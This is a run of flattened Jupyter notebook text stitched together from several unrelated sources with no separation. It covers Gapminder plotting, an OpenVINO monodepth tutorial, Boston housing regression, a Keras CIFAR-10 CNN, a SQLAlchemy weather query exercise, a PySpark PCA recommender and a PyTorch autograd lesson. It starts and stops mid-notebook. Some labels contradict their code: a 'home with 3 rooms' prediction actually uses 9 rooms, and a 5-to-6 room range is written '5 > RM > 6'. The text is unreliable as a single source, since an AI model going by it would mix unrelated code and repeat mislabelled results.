'population_total': 'population', 'name': 'country', 'world_6region': 'region' }) merged.head() merged.head()Explore datamerged.dtypes merged.describe() merged.describe(exclude='number') merged.country.unique() usa = merged[merged.country=="United States"] usa.head() usa[usa.year.isin([1818, 1918, 2018])] china = merged[merged.country=="China"] china.head() china[china.year.isin([1818, 1918, 2018])]Plot visualization Changed title on graph, adjusted size of markers on graph, set style to 'whitegrid'import seaborn as sns year_2018= merged[merged['year'] == 2018] sns.set_style("whitegrid") sns.relplot(x='income', y='lifespan', hue='region', size='population', sizes=(20, 500), data=year_2018) plt.title("Income Per Person GDP Per Capita PPP Inflation Adjusted") plt.text(x=40000.0, y=85, s="Income vs Lifespan by Country") plt.show();Analyze outliersqatar_year_2018 = year_2018[(year_2018.income > 80000) & (year_2018.country == 'Qatar')].sort_values(by='income') qatar_year_2018 sns.relplot(x='income', y='lifespan', hue='region', size='population', sizes=(20, 460), data=year_2018); plt.text(x=qatar_year_2018.income, y=qatar_year_2018.lifespan + 1, s='Qatar') plt.title("Income Per Person GDP Per Capita PPP Inflation Adjusted") plt.text(x=30000.0, y=85, s="2018 Qatar Outlier Displayed") plt.show();Plot multiple yearsyears = [1818, 1918, 2018] centuries = merged[merged.year.isin(years)] sns.relplot(x='income', y='lifespan', hue='region', size='population', col='year', data=centuries) plt.xscale('log'); plt.text(x=qatar_year_2018.income-5000, y=qatar_year_2018.lifespan + 1, s='Qatar');Point out a storyyears = [1918, 1938, 1958, 1978, 1998, 2018] decades = merged[merged.year.isin(years)] sns.relplot(x='income', y='lifespan', hue='region', size='population', sizes=(20, 400), col='year', data=decades); for year in years: sns.relplot(x='income', y='lifespan', hue='region', size='population', sizes=(20, 600), data=merged[merged.year==year]) plt.xscale('log') plt.xlim((150, 150000)) plt.ylim((0, 90)) plt.title(year) plt.axhline(y=50, color='grey') merged[(merged.year==1918) & (merged.lifespan >50)] merged[(merged.year==2018) & (merged.lifespan <50)] year = 1883 #@param {type:"slider", min:1800, max:2018, step:1} sns.relplot(x='income', y='lifespan', hue='region', size='population', data=merged[merged.year==year]) plt.xscale('log') plt.xlim((150, 150000)) plt.ylim((20, 90)) plt.title(year);Monodepth Estimation with OpenVINOThis tutorial demonstrates Monocular Depth Estimation with MidasNet in OpenVINO. Model information: https://docs.openvinotoolkit.org/latest/omz_models_model_midasnet.html ![monodepth](https://user-images.githubusercontent.com/36741649/127173017-a0bbcf75-db24-4d2c-81b9-616e04ab7cd9.gif) What is Monodepth?Monocular Depth Estimation is the task of estimating scene depth using a single image. It has many potential applications in robotics, 3D reconstruction, medical imaging and autonomous systems. For this demo, we use a neural network model called [MiDaS](https://github.com/intel-isl/MiDaS) which was developed by the [Embodied AI Foundation](https://www.embodiedaifoundation.org/). Check out the research paper below to learn more. , , , and , ["Towards Robust Monocular Depth Estimation: Mixing Datasets for Zero-shot Cross-dataset Transfer,"](https://ieeexplore.ieee.org/document/9178977) in IEEE Transactions on Pattern Analysis and Machine Intelligence, doi: 10.1109/TPAMI.2020.3019967. Preparation Importsimport sys import time from pathlib import Path import cv2 import matplotlib.cm import matplotlib.pyplot as plt import numpy as np from IPython.display import ( HTML, FileLink, Pretty, ProgressBar, Video, clear_output, display, ) from openvino.inference_engine import IECore sys.path.append("../utils") from notebook_utils import load_imageSettingsDEVICE = "CPU" MODEL_FILE = "model/MiDaS_small.xml" model_xml_path = Path(MODEL_FILE)Functionsdef normalize_minmax(data): """Normalizes the values in `data` between 0 and 1""" return (data - data.min()) / (data.max() - data.min()) def convert_result_to_image(result, colormap="viridis"): """ Convert network result of floating point numbers to an RGB image with integer values from 0-255 by applying a colormap. `result` is expected to be a single network result in 1,H,W shape `colormap` is a matplotlib colormap. See https://matplotlib.org/stable/tutorials/colors/colormaps.html """ cmap = matplotlib.cm.get_cmap(colormap) result = result.squeeze(0) result = normalize_minmax(result) result = cmap(result)[:, :, :3] * 255 result = result.astype(np.uint8) return result def to_rgb(image_data) -> np.ndarray: """ Convert image_data from BGR to RGB """ return cv2.cvtColor(image_data, cv2.COLOR_BGR2RGB)Load the ModelLoad the model in Inference Engine with `ie.read_network` and load it to the specified device with `ie.load_network`. Get input and output keys and the expected input shape for the model.ie = IECore() net = ie.read_network(model=model_xml_path, weights=model_xml_path.with_suffix(".bin")) exec_net = ie.load_network(network=net, device_name=DEVICE) input_key = list(exec_net.input_info)[0] output_key = list(exec_net.outputs.keys())[0] network_input_shape = exec_net.input_info[input_key].tensor_desc.dims network_image_height, network_image_width = network_input_shape[2:]Monodepth on Image Load, resize and reshape input imageThe input image is read with OpenCV, resized to network input size, and reshaped to (N,C,H,W) (N=number of images, C=number of channels, H=height, W=width).IMAGE_FILE = "data/coco_bike.jpg" image = load_image(path=IMAGE_FILE) # resize to input shape for network resized_image = cv2.resize(src=image, dsize=(network_image_height, network_image_width)) # reshape image to network input shape NCHW input_image = np.expand_dims(np.transpose(resized_image, (2, 0, 1)), 0)Do inference on imageDo the inference, convert the result to an image, and resize it to the original image shaperesult = exec_net.infer(inputs={input_key: input_image})[output_key] # convert network result of disparity map to an image that shows # distance as colors result_image = convert_result_to_image(result=result) # resize back to original image shape. cv2.resize expects shape # in (width, height), [::-1] reverses the (height, width) shape to match this result_image = cv2.resize(result_image, image.shape[:2][::-1])Display monodepth imagefig, ax = plt.subplots(1, 2, figsize=(20, 15)) ax[0].imshow(to_rgb(image)) ax[1].imshow(result_image);Monodepth on VideoBy default, only the first 100 frames are processed, in order to quickly check that everything works. Change NUM_FRAMES in the cell below to modify this. Set NUM_FRAMES to 0 to process the whole video. Video Settings# Video source: https://www.youtube.com/watch?v=fu1xcQdJRws (Public Domain) VIDEO_FILE = "data/Coco Walking in Berkeley.mp4" # Number of seconds of input video to process. Set to 0 to process # the full video. NUM_SECONDS = 4 # Set ADVANCE_FRAMES to 1 to process every frame from the input video # Set ADVANCE_FRAMES to 2 to process every second frame. This reduces # the time it takes to process the video ADVANCE_FRAMES = 2 # Set SCALE_OUTPUT to reduce the size of the result video # If SCALE_OUTPUT is 0.5, the width and height of the result video # will be half the width and height of the input video SCALE_OUTPUT = 0.5 # The format to use for video encoding. vp09 is slow, # but it works on most systems. # Try the THEO encoding if you have FFMPEG installed. # FOURCC = cv2.VideoWriter_fourcc(*"THEO") FOURCC = cv2.VideoWriter_fourcc(*"vp09") # Create Path objects for the input video and the resulting video output_directory = Path("output") output_directory.mkdir(exist_ok=True) result_video_path = output_directory / f"{Path(VIDEO_FILE).stem}_monodepth.mp4"Load VideoLoad video from `VIDEO_FILE`, set in the *Video Settings* cell above. Open the video to read the frame width and height and fps, and compute values for these properties for the monodepth video.cap = cv2.VideoCapture(str(VIDEO_FILE)) ret, image = cap.read() if not ret: raise ValueError(f"The video at {VIDEO_FILE} cannot be read.") input_fps = cap.get(cv2.CAP_PROP_FPS) input_video_frame_height, input_video_frame_width = image.shape[:2] target_fps = input_fps / ADVANCE_FRAMES target_frame_height = int(input_video_frame_height * SCALE_OUTPUT) target_frame_width = int(input_video_frame_width * SCALE_OUTPUT) cap.release() print( f"The input video has a frame width of {input_video_frame_width}, " f"frame height of {input_video_frame_height} and runs at {input_fps:.2f} fps" ) print( "The monodepth video will be scaled with a factor " f"{SCALE_OUTPUT}, have width {target_frame_width}, " f" height {target_frame_height}, and run at {target_fps:.2f} fps" )Do Inference on a Video and Create Monodepth Video# Initialize variables input_video_frame_nr = 0 start_time = time.perf_counter() total_inference_duration = 0 # Open input video cap = cv2.VideoCapture(str(VIDEO_FILE)) # Create result video out_video = cv2.VideoWriter( str(result_video_path), FOURCC, target_fps, (target_frame_width * 2, target_frame_height), ) num_frames = int(NUM_SECONDS * input_fps) total_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT) if num_frames == 0 else num_frames progress_bar = ProgressBar(total=total_frames) progress_bar.display() try: while cap.isOpened(): ret, image = cap.read() if not ret: cap.release() break if input_video_frame_nr >= total_frames: break # Only process every second frame # Prepare frame for inference # resize to input shape for network resized_image = cv2.resize(src=image, dsize=(network_image_height, network_image_width)) # reshape image to network input shape NCHW input_image = np.expand_dims(np.transpose(resized_image, (2, 0, 1)), 0) # Do inference inference_start_time = time.perf_counter() result = exec_net.infer(inputs={input_key: input_image})[output_key] inference_stop_time = time.perf_counter() inference_duration = inference_stop_time - inference_start_time total_inference_duration += inference_duration if input_video_frame_nr % (10 * ADVANCE_FRAMES) == 0: clear_output(wait=True) progress_bar.display() # input_video_frame_nr // ADVANCE_FRAMES gives the number of # frames that have been processed by the network display( Pretty( f"Processed frame {input_video_frame_nr // ADVANCE_FRAMES}" f"/{total_frames // ADVANCE_FRAMES}. " f"Inference time: {inference_duration:.2f} seconds " f"({1/inference_duration:.2f} FPS)" ) ) # Transform network result to RGB image result_frame = to_rgb(convert_result_to_image(result)) # Resize image and result to target frame shape result_frame = cv2.resize(result_frame, (target_frame_width, target_frame_height)) image = cv2.resize(image, (target_frame_width, target_frame_height)) # Put image and result side by side stacked_frame = np.hstack((image, result_frame)) # Save frame to video out_video.write(stacked_frame) input_video_frame_nr = input_video_frame_nr + ADVANCE_FRAMES cap.set(1, input_video_frame_nr) progress_bar.progress = input_video_frame_nr progress_bar.update() except KeyboardInterrupt: print("Processing interrupted.") finally: clear_output() processed_frames = num_frames // ADVANCE_FRAMES out_video.release() cap.release() end_time = time.perf_counter() duration = end_time - start_time print( f"Processed {processed_frames} frames in {duration:.2f} seconds. " f"Total FPS (including video processing): {processed_frames/duration:.2f}." f"Inference FPS: {processed_frames/total_inference_duration:.2f} " ) print(f"Monodepth Video saved to '{str(result_video_path)}'.")Display Monodepth Videovideo = Video(result_video_path, width=800, embed=True) if not result_video_path.exists(): plt.imshow(stacked_frame) raise ValueError("OpenCV was unable to write the video file. Showing one video frame.") else: print(f"Showing monodepth video saved at\n{result_video_path.resolve()}") print( "If you cannot see the video in your browser, please click on the " "following link to download the video " ) video_link = FileLink(result_video_path) video_link.html_link_str = "%s" display(HTML(video_link._repr_html_())) display(video)Linear Regresionimport sklearn as skl import numpy as np import scipy as sc import matplotlib.pyplot as plt from sklearn.datasets import load_boston from sklearn import linear_model from sklearn.metrics import mean_squared_error boston_dataset = load_boston() print(boston_dataset.DESCR) X = boston_dataset.data Y = boston_dataset.target n, p = X.shape print(boston_dataset.DESCR).. _boston_dataset: Boston house prices dataset --------------------------- **Data Set Characteristics:** :Number of Instances: 506 :Number of Attributes: 13 numeric/categorical predictive. Median Value (attribute 14) is usually the target. :Attribute Information (in order): - CRIM per capita crime rate by town - ZN proportion of residential land zoned for lots over 25,000 sq.ft. - INDUS proportion of non-retail business acres per town - CHAS Charles River dummy variable (= 1 if tract bounds river; 0 otherwise) - NOX nitric oxides concentration (parts per 10 million) - RM average number of rooms per dwelling - AGE proportion of owner-occupied units built prior to 1940 - DIS weighted distances to five Boston employment centres - RAD index of accessibility to radial highways - TAX full-value property-tax rate per $10,000 - PTRATIO pu[...]Analysis of Data---print("---") print("coefficent of Correlationship:", np.corrcoef(X[:, 5], Y)[0, 1]) print("---") mask = np.logical_and(X[:,5] > 5, X[:,5] < 6) print("Mean value of house with RM between -> 5 > RM > 6 :", np.mean(Y[mask])) plt.title("RM vs MDEV") plt.xlabel("Mean rooms (RM)") plt.ylabel("Mean Value House (MDEV)") plt.scatter(X[:, 5], Y, alpha=0.4) plt.show() plt.hist(Y, bins=120) plt.ylabel('Examples') plt.xlabel('Prize -> miles $') plt.show() print('''Abnormal mean home value for exactly $ 50,000. Possible truncation''')--- coefficent of Correlationship: 0.695359947071539 --- Mean value of house with RM between -> 5 > RM > 6 : 17.551592356687898Simple Linear Regression - Ordinary least squares $ W = (X^TX)^{-1}X^TY $ --- Mean Squared Error $ \operatorname{MSE}=\frac{1}{n}\sum_{i=1}^n(Y_{Pi} - Y_i)^2. $ ---plt.title("Linear Regression") plt.scatter(X[:, 5], Y, alpha=0.5) plt.xlabel("Mean numbers of rooms (RM)") plt.ylabel("Mean value of home (MDEV)") aX = np.hstack((np.ones((n,1)), X[:,5:6])) _Y = Y[:, np.newaxis] # Linear regression aplication W = np.linalg.inv(aX.T @ aX) @ aX.T @ _Y # Plot the regression x0 = [4, 9] plt.plot(x0, [W[0, 0] + W[1, 0] * x0[0], W[0, 0] + W[1, 0] * x0[1]], c="red") plt.show() print("---") print("Value predicted for a home with 3 rooms: ", [1, 9] @ W) print("Mean rooms in homes for 45.000$: ", (45 - W[0])/W[1]) print("---") Yp = aX @ W MSE = lambda Yp, Y: np.mean(np.power(Yp - Y[:, np.newaxis], 2)) print("Mean Squared Error:", MSE(Yp, Y))Simple Linear Regression with Sklearn.---regr = linear_model.LinearRegression() regr.fit(X[:, 5:6], Y[:, np.newaxis]) y_pred = regr.predict([[9]]) print(regr.coef_, regr.intercept_) print(y_pred) print(mean_squared_error(Y, regr.predict(X[:, 5:6])))[[9.10210898]] [-34.67062078] [[47.24836005]] 43.60055177116956Multiple Linear Regression $ W = (X^TX)^{-1}X^TY $ ---regr = linear_model.LinearRegression() regr.fit(aX, Y[:, np.newaxis]) print("---") print(regr.intercept_, regr.coef_) print("Mean Squared Error :", mean_squared_error(Y, regr.predict(aX)))--- [18.56711151] [[ 0. 4.51542094 -0.93072256 -0.57180569]] Mean Squared Error : 27.130405758497062Artificial Intelligence Nanodegree Convolutional Neural Networks---In this notebook, we train a CNN to classify images from the CIFAR-10 database. 1. Load CIFAR-10 Databaseimport keras from keras.datasets import cifar10 # load the pre-shuffled train and test data (x_train, y_train), (x_test, y_test) = cifar10.load_data()Using TensorFlow backend.2. Visualize the First 24 Training Imagesimport numpy as np import matplotlib.pyplot as plt %matplotlib inline fig = plt.figure(figsize=(20,5)) for i in range(36): ax = fig.add_subplot(3, 12, i + 1, xticks=[], yticks=[]) ax.imshow(np.squeeze(x_train[i]))3. Rescale the Images by Dividing Every Pixel in Every Image by 255# rescale [0,255] --> [0,1] x_train = x_train.astype('float32')/255 x_test = x_test.astype('float32')/2554. Break Dataset into Training, Testing, and Validation Setsfrom keras.utils import np_utils # one-hot encode the labels num_classes = len(np.unique(y_train)) y_train = keras.utils.to_categorical(y_train, num_classes) y_test = keras.utils.to_categorical(y_test, num_classes) # break training set into training and validation sets (x_train, x_valid) = x_train[5000:], x_train[:5000] (y_train, y_valid) = y_train[5000:], y_train[:5000] # print shape of training set print('x_train shape:', x_train.shape) # print number of training, validation, and test images print(x_train.shape[0], 'train samples') print(x_test.shape[0], 'test samples') print(x_valid.shape[0], 'validation samples')x_train shape: (45000, 32, 32, 3) 45000 train samples 10000 test samples 5000 validation samples5. Define the Model Architecturefrom keras.models import Sequential from keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout, Activation # My modified model model = Sequential() model.add(Conv2D(filters=32, kernel_size=4, padding='same', input_shape=x_train.shape[1:])) model.add(Activation('relu')) model.add(Conv2D(filters=64, kernel_size=4, padding='same')) model.add(Activation('relu')) model.add(MaxPooling2D(pool_size=2)) model.add(Dropout(0.15)) model.add(Conv2D(filters=128, kernel_size=4, padding='same')) model.add(Activation('relu')) model.add(MaxPooling2D(pool_size=4)) model.add(Dropout(0.25)) model.add(Conv2D(filters=256, kernel_size=4, padding='same')) model.add(MaxPooling2D(pool_size=4)) model.add(Dropout(0.35)) # model.add(Conv2D(filters=512, kernel_size=4, padding='same')) model.add(Dropout(0.45)) model.add(Flatten()) model.add(Dense(512)) model.add(Activation('relu')) model.add(Dropout(0.55)) model.add(Dense(num_classes)) model.add(Activation('softmax')) # Original model # model = Sequential() # model.add(Conv2D(filters=16, kernel_size=2, padding='same', activation='relu', # input_shape=(32, 32, 3))) # model.add(MaxPooling2D(pool_size=2)) # model.add(Conv2D(filters=32, kernel_size=2, padding='same', activation='relu')) # model.add(MaxPooling2D(pool_size=2)) # model.add(Conv2D(filters=64, kernel_size=2, padding='same', activation='relu')) # model.add(MaxPooling2D(pool_size=2)) # model.add(Dropout(0.3)) # model.add(Flatten()) # model.add(Dense(500, activation='relu')) # model.add(Dropout(0.4)) # model.add(Dense(10, activation='softmax')) model.summary()_________________________________________________________________ Layer (type) Output Shape Param # ================================================================= conv2d_32 (Conv2D) (None, 32, 32, 32) 1568 _________________________________________________________________ activation_25 (Activation) (None, 32, 32, 32) 0 _________________________________________________________________ conv2d_33 (Conv2D) (None, 32, 32, 64) 32832 _________________________________________________________________ activation_26 (Activation) (None, 32, 32, 64) 0 _________________________________________________________________ max_pooling2d_18 (MaxPooling (None, 16, 16, 64) 0 _________________________________________________________________ dropout_21 (Dropout) (None, 16, 16, 64) 0 _________________________________________________________________ conv2d_34 [...]6. Compile the Model# compile the model model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])7. Train the Modelfrom keras.callbacks import ModelCheckpoint # train the model checkpointer = ModelCheckpoint(filepath='model.weights.best.hdf5', verbose=1, save_best_only=True) hist = model.fit(x_train, y_train, batch_size=32, epochs=100, validation_data=(x_valid, y_valid), callbacks=[checkpointer], verbose=2, shuffle=True)8. Load the Model with the Best Validation Accuracy# load the weights that yielded the best validation accuracy model.load_weights('model.weights.best.hdf5')9. Calculate Classification Accuracy on Test Set# evaluate and print test accuracy score = model.evaluate(x_test, y_test, verbose=0) print('\n', 'Test accuracy:', score[1])10. Visualize Some PredictionsThis may give you some insight into why the network is misclassifying certain objects.# get predictions on the test set y_hat = model.predict(x_test) # define text labels (source: https://www.cs.toronto.edu/~kriz/cifar.html) cifar10_labels = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'] # plot a random sample of test images, their predicted labels, and ground truth fig = plt.figure(figsize=(20, 8)) for i, idx in enumerate(np.random.choice(x_test.shape[0], size=32, replace=False)): ax = fig.add_subplot(4, 8, i + 1, xticks=[], yticks=[]) ax.imshow(np.squeeze(x_test[idx])) pred_idx = np.argmax(y_hat[idx]) true_idx = np.argmax(y_test[idx]) ax.set_title("{} ({})".format(cifar10_labels[pred_idx], cifar10_labels[true_idx]), color=("green" if pred_idx == true_idx else "red"))Reflect Tables into SQLAlchemy ORM# Python SQL toolkit and Object Relational Mapper import sqlalchemy from sqlalchemy.ext.automap import automap_base from sqlalchemy.orm import Session from sqlalchemy import create_engine, func # create engine to hawaii.sqlite engine = create_engine("sqlite:///Resources/hawaii.sqlite") # reflect an existing database into a new model Base = automap_base() # reflect the tables Base.prepare(engine, reflect=True) # View all of the classes that automap found Base.classes.keys() # Save references to each table Measurement = Base.classes.measurement Station = Base.classes.station # Create our session (link) from Python to the DB session = Session(engine)Exploratory Precipitation Analysis# Find the most recent date in the data set. session.query(Measurement.date).order_by(Measurement.date.desc()).first() # Design a query to retrieve the last 12 months of precipitation data and plot the results. # Starting from the most recent data point in the database. # Calculate the date one year from the last date in data set. # Perform a query to retrieve the data and precipitation scores year_query = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= '2016-08-23') # Save the query results as a Pandas DataFrame and set the index to the date column year_df = pd.read_sql(year_query.statement, engine) year_df.set_index('date', inplace = True) # Sort the dataframe by date year_df.sort_values(by = "date", inplace = True) year_df_dsum = year_df.groupby("date").sum() year_df_dsum = year_df_dsum["prcp"].round(2).to_frame() display(year_df_dsum) #Create vector of positions for x-axis labels x_even = list(np.linspace(0, 365, num = 12)) import datetime as dt dates = [] for i in range (8, 13): dates.append(str(dt.date(2016, i, 23))) for j in range(1, 9): dates.append(str(dt.date(2017, j, 23))) # Use Pandas Plotting with Matplotlib to plot the data year_df_dsum.plot(kind = "bar", figsize = (14, 4)) plt.xticks(ticks= x_even, labels = dates) plt.tight_layout() plt.show() #Code stops but still produces a graph # Use Pandas to calculate the summary statistics for the precipitation data year_df_dsum.describe()Exploratory Station Analysis# Design a query to calculate the total number stations in the dataset session.query(Station.station).count() # Design a query to find the most active stations (i.e. what stations have the most rows?) # List the stations and the counts in descending order. station_activity = session.query(Measurement.station, func.count(Measurement.station))\ .group_by(Measurement.station).order_by(func.count(Measurement.station).desc())\ .all() station_activity # Using the most active station id from the previous query, calculate the lowest, highest, and average temperature. station_id = station_activity[0][0] temp_min = session.query(func.min(Measurement.tobs)).filter(Measurement.station == station_id).first()[0] temp_max = session.query(func.max(Measurement.tobs)).filter(Measurement.station == station_id).first()[0] temp_avg = session.query(func.avg(Measurement.tobs)).filter(Measurement.station == station_id).first()[0] print(f"The minimum temperature at station {station_id} was {temp_min} degrees.") print(f"The maximum temperature at station {station_id} was {temp_max} degrees.") print(f"The average temperature at station {station_id} was {round(temp_avg, 1)} degrees.") # Using the most active station id # Query the last 12 months of temperature observation data for this station and plot the results as a histogram temps_last_year = session.query(Measurement.tobs).filter(Measurement.station == station_id)\ .filter(Measurement.date >= '2016-08-23').all() temp_list = [item for t in temps_last_year for item in t] plt.hist(temp_list, bins = 12, color = "purple") plt.xlabel("Temperature (F)") plt.ylabel("Frequency") plt.show()Close session# Close Session session.close()Content-based Recommendations with PCA Similar movies have similar tags. How well is this similarity captured with PCA?sc sc.install_pypi_package('pandas') sc.install_pypi_package('scikit-learn') df = sqlContext.read.csv('s3a://sparkdemonstration/movielens-tag-relevance.csv', header=True, inferSchema=True) import random colsToShow = ['title'] + [random.choice(df.columns) for i in range(4)] df.select(*colsToShow).show() from pyspark.ml.feature import VectorAssembler, StandardScaler newCols = [] for c in df.columns: if "." in c: new_column = c.replace('.', '_') df = df.withColumnRenamed(c, new_column) newCols.append(new_column) else: newCols.append(c) assembler = VectorAssembler(inputCols=[c for c in newCols if c != 'title'], outputCol='features') scaler = StandardScaler(inputCol='features', outputCol='normFeats', withMean=True) df = assembler.transform(df) scalerModel = scaler.fit(df) df = scalerModel.transform(df)PCArdd = df.select('normFeats').rdd from pyspark.mllib.linalg.distributed import RowMatrix from pyspark.mllib.linalg import Vectors vectors = rdd.map(Vectors.dense) matrix = RowMatrix(vectors)Get the PCspc = matrix.computePrincipalComponents(500) matrix_reduced = matrix.multiply(pc)Nearest Neighbour Search in PC spaceimport numpy as np X = matrix_reduced.rows.map(np.array).collect() X = np.array(X) titles = df.select('title').toPandas() import pandas as pd pdf = pd.DataFrame(X, index=titles['title']) pdf.head() from sklearn.neighbors import NearestNeighbors n_pcs = 2 nn = NearestNeighbors() nn = nn.fit(X[:, :n_pcs]) neighbors = nn.kneighbors(pdf.loc['Toy Story (1995)'].values[:n_pcs].reshape(1, -1), return_distance=False) pdf.index[neighbors.ravel()].tolist()Increase the number of Principal Componentsn_pcs = 10 nn = NearestNeighbors() nn = nn.fit(X[:, :n_pcs]) neighbors = nn.kneighbors(pdf.loc['Toy Story (1995)'].values[:n_pcs].reshape(1, -1), return_distance=False) pdf.index[neighbors.ravel()].tolist()n_pcs = 100 nn = NearestNeighbors() nn = nn.fit(X[:, :n_pcs]) neighbors = nn.kneighbors(pdf.loc['Toy Story (1995)'].values[:n_pcs].reshape(1, -1), return_distance=False) pdf.index[neighbors.ravel()].tolist() n_pcs = 500 nn = NearestNeighbors() nn = nn.fit(X[:, :n_pcs]) neighbors = nn.kneighbors(pdf.loc['Toy Story (1995)'].values[:n_pcs].reshape(1, -1), return_distance=False) pdf.index[neighbors.ravel()].tolist() n_pcs = 10 nn = NearestNeighbors() nn = nn.fit(X[:, :n_pcs]) neighbors = nn.kneighbors(pdf.loc['Conjuring, The (2013)'].values[:n_pcs].reshape(1, -1), return_distance=False) pdf.index[neighbors.ravel()].tolist()PyTorch TutorialIFT6135 – Representation LearningA Deep Learning Course, January 2018By (Adapted from Sandeep Subramanian's 2017 MILA tutorial) Torch Autograd, Variables, Define-by-run & Execution ParadigmAdapted from1. http://pytorch.org/tutorials/beginner/blitz/autograd_tutorial.htmlsphx-glr-beginner-blitz-autograd-tutorial-py 2. http://pytorch.org/docs/master/notes/autograd.html Variables : Thin wrappers around tensors to facilitate autogradSupports almost all operations that can be performed on regular tensorsimport numpy as np from __future__ import print_function import torch from torch.autograd import Variable![caption](images/Variable.png) Wrap tensors in a Variablez = Variable(torch.Tensor(5, 3).uniform_(-1, 1)) print(z)Variable containing: 0.3760 -0.5708 0.0276 -0.3886 -0.8144 -0.9552 -0.8893 0.3455 0.4211 0.5057 -0.9361 0.7122 -0.4049 -0.6500 0.0533 [torch.FloatTensor of size 5x3]Properties of Variables : Requiring gradients, Volatility, Data & Grad1. You can access the raw tensor through the .data attribute2. Gradient of the loss w.r.t. this variable is accumulated into .grad.3. Stay tuned for requires_grad and volatileprint('Requires Gradient : %s ' % (z.requires_grad)) print('Volatile : %s ' % (z.volatile)) print('Gradient : %s ' % (z.grad)) print(z.data) ### Operations on Variables x = Variable(torch.Tensor(5, 3).uniform_(-1, 1)) y = Variable(torch.Tensor(3, 5).uniform_(-1, 1)) # matrix multiplication z = torch.mm(x, y) print(z.size())torch.Size([5, 5])Define-by-run ParadigmThe torch autograd package provides automatic differentiation for all operations on Tensors.PyTorch's autograd is a reverse mode automatic differentiation system.Backprop is defined by how your code is run, and that every single iteration can be different.Other frameworks that adopt a similar approach :1. Chainer - https://github.com/chainer/chainer2. DyNet - https://github.com/clab/dynet3. Tensorflow Eager - https://research.googleblog.com/2017/10/eager-execution-imperative-define-by.html How autograd encodes execution historyConceptually, autograd maintains a graph that records all of the operations performed on variables as you execute your operations. This results in a directed acyclic graph whose leaves are the input variables and roots are the output variables. By tracing this graph from roots to leaves, you can automatically compute the gradients using the chain rule. ![caption](images/dynamic_graph.gif) GIF source: https://github.com/pytorch/pytorch Internally, autograd represents this graph as a graph of Function objects (really expressions), which can be `apply()` ed to compute the result of evaluating the graph. When computing the forwards pass, autograd simultaneously performs the requested computations and builds up a graph representing the function that computes the gradient (the `.grad_fn` attribute of each Variable is an entry point into this graph). When the forwards pass is completed, we evaluate this graph in the backwards pass to compute the gradients.x = Variable(torch.Tensor(5, 3).uniform_(-1, 1)) y = Variable(torch.Tensor(3, 5).uniform_(-1, 1)) z = torch.mm(x, y) print(z.grad_fn)NoneAn important thing to note is that the graph is recreated from scratch at every iteration, and this is exactly what allows for using arbitrary Python control flow statements, that can change the overall shape and size of the graph at every iteration. You don’t have to encode all possible paths before you launch the training - what you run is what you differentiate. Getting gradients : `backward()` & `torch.autograd.grad`x = Variable(torch.Tensor(5, 3).uniform_(-1, 1), requires_grad=True) y = Variable(torch.Tensor(5, 3).uniform_(-1, 1), requires_grad=True) z = x ** 2 + 3 * y z.backward(gradient=torch.ones(5, 3)) # eq computes element-wise equality torch.eq(x.grad, 2 * x) y.grad x = Variable(torch.Tensor(5, 3).uniform_(-1, 1), requires_grad=True) y = Variable(torch.Tensor(5, 3).uniform_(-1, 1), requires_grad=True) z = x ** 2 + 3 * y dz_dx = torch.autograd.grad(z, x, grad_outputs=torch.ones(5, 3)) dz_dy = torch.autograd.grad(z, y, grad_outputs=torch.ones(5, 3))Define-by-run example Common Variable definitionx = Variable(torch.Tensor(5, 3).uniform_(-1, 1), requires_grad=True) w = Variable(torch.Tensor(3, 10).uniform_(-1, 1), requires_grad=True) b = Variable(torch.Tensor(10,).uniform_(-1, 1), requires_grad=True)Graph 1 : `wx + b`o = torch.matmul(x, w) + b do_dinputs_1 = torch.autograd.grad(o, [x, w, b], grad_outputs=torch.ones(5, 10)) print('Gradients of o w.r.t inputs in Graph 1') print('do/dx : \n\n %s ' % (do_dinputs_1[0])) print('do/dw : \n\n %s ' % (do_dinputs_1[1])) print('do/db : \n\n %s ' % (do_dinputs_1[2]))Gradients of o w.r.t inputs in Graph 1 do/dx : Variable containing: -1.8514 3.5508 -0.7722 -1.8514 3.5508 -0.7722 -1.8514 3.5508 -0.7722 -1.8514 3.5508 -0.7722 -1.8514 3.5508 -0.7722 [torch.FloatTensor of size 5x3] Variable containing: -1.8514 3.5508 -0.7722 [torch.FloatTensor of size 3] do/dw : Variable containing: 2.4109 2.4109 2.4109 2.4109 2.4109 2.4109 2.4109 2.4109 2.4109 2.4109 0.9007 0.9007 0.9007 0.9007 0.9007 0.9007 0.9007 0.9007 0.9007 0.9007 -0.6632 -0.6632 -0.6632 -0.6632 -0.6632 -0.6632 -0.6632 -0.6632 -0.6632 -0.6632 [torch.FloatTensor of size 3x10] do/db : Variable containing: 5 5 5 5 5 5 5 5 5 5 [torch.FloatTensor of size 10]Graph 2 : wx / bo = torch.matmul(x, w) / b do_dinputs_2 = torch.autograd.grad(o, [x, w, b], grad_outputs=torch.ones(5, 10)) print('Gradients of o w.r.t inputs in Graph 2') print('do/dx : \n %s ' % (do_dinputs_2[0]), (w/b[None,:]).sum(1)) print('do/dw : \n %s ' % (do_dinputs_2[1]), (x.sum(0)[:,None]/b[None,:])) print('do/db : \n %s ' % (do_dinputs_2[2]))Gradients of o w.r.t inputs in Graph 2 do/dx : Variable containing: -1.9936 -0.3440 -1.9236 -1.9936 -0.3440 -1.9236 -1.9936 -0.3440 -1.9236 -1.9936 -0.3440 -1.9236 -1.9936 -0.3440 -1.9236 [torch.FloatTensor of size 5x3] Variable containing: -1.9936 -0.3440 -1.9236 [torch.FloatTensor of size 3] do/dw : Variable containing: Columns 0 to 7 -6.2344 -12.4075 2.4306 -4.7803 9.2018 -3.3722 -3.2028 3.7256 -2.3293 -4.6356 0.9081 -1.7860 3.4379 -1.2599 -1.1966 1.3919 1.7149 3.4129 -0.6686 1.3149 -2.5311 0.9276 0.8810 -1.0248 Columns 8 to 9 6.6273 5.8223 2.4761 2.1753 -1.8230 -1.6015 [torch.FloatTensor of size 3x10] Variable containing: Columns 0 to 7 -6.2344 -12.4075 2.4306 -4.7803 9.2018 -3.3722 -3.2028 3.7256 -2.3293 -4.6356 0.9081 -1.7860 3.4379 -1.2599 -1.1966 1.3919 1.7149 3.4129 -0.6686 1.3149 -2.5311 0.9276 0.8810 -1.0248 Columns 8 to 9 6.6273 5.8223 2.4761 2.1753 -1.8230 -1.6015 [torc[...]Gradient buffers: `.backward()` and 